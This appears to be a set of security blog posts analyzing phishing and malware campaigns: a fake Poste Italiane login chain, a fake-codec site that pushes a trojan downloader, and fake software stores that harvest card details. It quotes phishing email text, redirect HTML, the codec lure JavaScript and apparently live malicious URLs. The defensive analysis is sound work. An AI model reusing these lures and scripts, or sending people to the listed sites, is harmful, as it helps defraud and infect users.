Reversing Trojan.Zhelatin.pk Released

Hi,

I’ve just released a little overview of Trojan-Zhelatin.pk under a Reverse Engineering point of view.

Paper is HERE

Regards,

Giuseppe ‘Evilcry’ Bonfa’

Posteitaliane Mail Fraud

Hi,

This classical form of scam is now sent to @hotmail.it accounts, here some detail on the e-mail:

Subject: Accredito temporaneamente bloccato‏

From: accrediti@posteitaliane.it

Content: Ultime da Poste Italiane:  Gentile Cliente,
Abbiamo ricevuto una segnalazione di accredito di Euro 100 da UFFICIO POSTALE ROMA 52. L’accredito e’ stato temporaneamente bloccato a causa dell’incongruenza dei suoi dati, potra’ ora verificare i suoi dati e successivamente sara’ accreditato sul suo conto postale
 

Victim will be prompted to

http://www.nouvelles-alternatives.be/wp-content/conf.php

that contains:

<HTML>
<HEAD>
<META HTTP-EQUIV=”REFRESH” CONTENT=”0; URL=http://osrever.es/intranet/modules/mod_login/bpol/CARTEPRE/“>
</HEAD>
</HTML>

automaticalli redirected to osrever.es that contains another redirect:

<HEAD><!DOCTYPE HTML PUBLIC “-//W3C//DTD HTML 4.0 Transitional//EN”>
<body>
</body>
<HTML><TITLE>POSTE</TITLE>
<meta http-equiv=”Refresh” content=”0; URL=index.php?MfcISAPICommand=SignInFPP&UsingSSL=1&email=&userid=”>
</HEAD>
</HTML>

finally user lands here:

http://osrever.es/intranet/modules/mod_login/bpol/CARTEPRE/index.php?MfcISAPICommand=SignInFPP&UsingSSL=1&email=&userid=

As we can see from the Source Code there is a classical structure that ask to the user User and Password, these are the functions:

function ControllaPassword()
{
   var f = window.document.frmRegister

   if (f.password.value.length > 10 )
   {
      alert(“La Password non puo’ superare la lunghezza di 10 caratteri.”)
      f.password.focus()
      return false
   }
   return true
}

That verifies if the password haa a correct length, and

function ControlloValori()
{
    var f = window.document.frmRegister
    if (f.login.value==””)
    {
        alert(“Inserire il nome utente”)
        f.login.focus
        return false
    }

    if ( ControllaPassword() == false )
    {
        return false;
    }

    return true
}

that collects user and pwd

If credentials are correct user is directed here:

http://osrever.es/intranet/modules/mod_login/bpol/CARTEPRE/index.php?MfcISAPICommand=VerifyFPP&UsingSSL=1&login=&pass=

where is asked for CC, CCV2, Scad

Here some info about this Malicious Domain:

IP Address:	87.106.195.10
IP Location	– Spain – Schlund + Partner Ag
Response Code:	200
Domain Status:	Registered And Active Website

See you to the next post.. 🙂

[Malware] Dissection of a Fake Codec Malicious Website

Hi,

Today I’ve received a spam mail from peteru.aranka.mark@t-online.de with the subject
“You gotta take a look at this video.” and a link to http://k_CENSORED_y.net/

From this domain we will be redirected to http://79._CENSORED_.18/ that presents
the following HTML:

———————————–
<script type=”text/javascript”>
<!–
window.location = “/uploads”
//–>
</script>
————————————

as suggested by the window.location we postpone /uploads to http://79._CENSORED_.18/

so we land here:

——————–
<!DOCTYPE HTML PUBLIC “-//IETF//DTD HTML 2.0//EN”>
<html><head>
<title>301 Moved Permanently</title>
</head><body>
<h1>Moved Permanently</h1>
<p>The document has moved <a href=”http://79._CENSORED_.18/uploads/”>here</a&gt;.</p>
<hr>
<address>Apache/2 Server at 79.1_CENSORED_.18 Port 80</address>
</body></html>
——————-

Get again with Malzilla http://79._CENSORED_.18/uploads/ and finally we land into the
real malicious page.

——————
<html>
<head>
<title>HARDCORE VIDEO ONLINE!</title>
——————

this is really intersting

——————
<script language=”javascript”>
codec_url=’viewer.exe’;
</script>
——————

Sounds like the classic Codec Scam, so let’s see what other does this page..

——————
<script language=”javascript”>

function softdownload()
{
if(window.navigator.userAgent.indexOf(“SV1”) != -1 || window.navigator.userAgent.indexOf(“MSIE 7”) !=-1)
{
return;
}
else
{
window.setTimeout(“location.href='” + codec_url + “‘”, 3000);
}
}

function play() {
if (confirm(‘Click \’OK\’ to download and install media codec.’)) {
window.location.href=codec_url;
}
else {
if (alert(‘Please download new version of media codec software.’)) {
play();
}
else {
play();
}
}
}
——————

The first function checks the UserAgent used by the victim if matches the correct
conditions, assembles the string that constitutes the download url.
The play() function tell to the victim to download and install viewer.exe

This is the fake advertise:

——————
<b>Video ActiveX Object Error:</b><br>

Your browser cannot display this video file.<br><br>
You need to download new version of Video<br>
ActiveX Object to play this video file.
——————

so user is prompted to download the Fake Codec.

Let’s see what is viewer.exe

File:      viewer.exe
Status: INFECTED/MALWARE
MD5:     9eae38ac9c9a97074ce4119d81fa7acf
Packers detected: –

Kaspersky Anti-Virus: Found Trojan-Downloader.Win32.Agent.aggp

So pay attention when you meet Websites that offers strange custom Codecs! 😉

See you to the next post.. 🙂

Other Fake Download Software with Credit Card Scam

Hi,

In the previous report I talked about OpenOffice Scam, some day after the first fraud mail
of this kind, in the Spam Box I detected other similar E-Mails for other products such as

• PDF Reader/Writer 9.0
• Firewall Protector
• SpyBot 1.6.0
• AVG Protection

Firewall Protector:

http://66.79.163.52/firewall/index.asp?aff=001&camp=firewall_espd&kbid=1578&sub=espd

PDF Reader/Writer 9.0:
http://instant-access.org/PDF09/index.asp?aff=001&camp=pdf_d&kbid=1580&sub=espd

SpyBot:

And the fake payment:

http://instant-access.org/spybot/2/index.asp?aff=001&camp=spybot_espd&kbid=1587&sub=spybot_espd

AVG Protection:
http://67.214.168.130/antivirus3/index.asp?aff=001&camp=avgesp&kbid=1587&sub=avgesp&pop=1

It’s intersting to notice that all mails are in the same style:

—-
AVG Security 2009
Protect your PC from Viruses

Download AVG Security Here

Here’s how to Download AVG Protection:

1. Go to: Download Page
2. Download AVG Security 2009
3. Receive access immediately

Protect your computer from virus attacks, Trojans, and other forms of Malware.
Included: Registry Repair, Firewall Pro, Spyware Remover

Thank you for choosing us, the worldwide leader in computer protection software.

For more information visit our website

Thank You,

David Matthews
PC Protection

If you want to stop receiving mail, please go to:
http://daily–email-products.info/

or you may contact us at the following address:

Plaza Neptuno, local #7
Via ricardo J Alfaro, Tumba Muerto
Panama Ciudad
Republica de Panama
—–

As usual User is asked to insert Credit Card Credentials and nothing happens..

See you to the next post!

Fake Download Open Office 2009 – Credit Card Fraud

Hi,

This morning I’ve discovered another funny Fraud attempt, based on a fake membership to Download Open Office 2009. This is the mail that I’ve received:

—————————————————————–

Open Office Suite 2009

Open, Create & Edit Your Files

Download Office Suite 2009??Here

Edit Word, Excel & Power Point files- 100% MS Office Compatible.

Office Solutions

Read and write PDF files just like Adobe.
Here’s how to download Open Office 2009:
1. Go to: Download Page
2. Download Open Office 2009
3. Receive access immediately
This software package is the best way to edit your documents.
Publish all of your documents online in the HTML format.
Thank you for choosing us, the worldwide leader in Open Office 2009.
For More Information Visit our Website
Thank You,

David Matthews

If you want to stop receiving mail, please go to:
http://daily–new-product.org/

or you may contact us at the following address:

Plaza Neptuno, local #7
Via ricardo J Alfaro, Tumba Muerto
Panama Ciudad
Republica de Panama

—————————————————————–

Republica de Panama? and OpenOffice?..that really strange you don’t !?!?

but let see this ‘great offer’..by clicking on the link reported into mail we are suddenly prompted to:

http://67.214.168.130/openoffice/index.asp?aff=001&camp=openoffice_espd&kbid=1587&sub=oo_espd&pop=1

and also this as you should understand sounds strange.. OpenOffice Website that is based upon an IP..

A classical well designed fake page, now let’s click on download, and as we can see we are asked for Membership, after filling email and Name/Surname fields appears the core of the Scam, the Membership to Be Activated needs a Credit Card Payment 😉

After accepting we are infront off a classical phishing form that contains:

• Name
• Surname
• Location
• PostalCode
• E-Mail
• Cc Number
• CcV2
• Scad

Here you can see the screenshot:

After clicking system “validates” you transaction and the fraud is successfully completed 🙂

Here some information about the used IP

IP Information for 67.214.168.130

IP Location:	United States South Bend Colostore.com
IP Address:	67.214.168.130
Blacklist Status:	Clear

Whois Record

OrgName:    Colostore.com
OrgID:      KCA-7
Address:    1805 South Michigan Street
City:       South Bend
StateProv:  IN
PostalCode: 46613
Country:    US

ReferralServer: rwhois://rwhois.colostore.com:4321/

NetRange:   67.214.160.0 – 67.214.191.255
CIDR:       67.214.160.0/19
OriginAS:   AS12260
NetName:    COLOSTORE-COM
NetHandle:  NET-67-214-160-0-1
Parent:     NET-67-0-0-0-0
NetType:    Direct Allocation
NameServer: NS1.COLOSTORE.COM
NameServer: NS2.COLOSTORE.COM
Comment:    http://www.colostore.com
RegDate:    2007-09-28
Updated:    2008-07-21

See you to the next post.. 🙂

An (In)security Overview on Analysis of Client-Server Software Applications

Hi,

I’ve released a little paper with title An (In)security Overview on Analysis of Client-Server Software Applications that I think is self explainatory.

Here a little abstract:

The principal objective of this paper is to give a good detailed
panoramic view of the Security aspects involved in Client-Server based
Applications. The panoramics will be seen from the point of view of a
Reverse Engineer that should be aware of the Security Problems that are
directly releated to the Client-Server Software Structure.

Here you can download the paper: http://evilcry.netsons.org/tuts/CSAnalysis.pdf

Regards,

Giuseppe ‘Evilcry’ Bonfa’

IDA Pro Enhances Hostile Code Analysis Support

Hi,

IDA Pro is really amazing, new IDA ( 5.4 ) will have an innovative support for Hostile Code Analysis, that consists on a Bochs Emulated Debug Environment.

“The next version of IDA will be released with a bochs debugger plugin, and what is nice about is that you will be able to use it easily by just downloading bochs executables and telling IDA where to find it.”

…

“Finally comes the pe loader, which is a specialized bochs loader, that will read your PE file and create a virtual environment similar to windows environment, trying to mimic basic demands for a PE file (import resolution, SEH, api emulation backed by IDC scripts).”

What to say? is a really great enhancement for Malware Analysis 😉

Here you can watch the first video on Bochs Debugging http://hex-rays.com/video/bochs_video_1.html

Regards,

Giuseppe ‘Evilcry’ Bonfa’ 🙂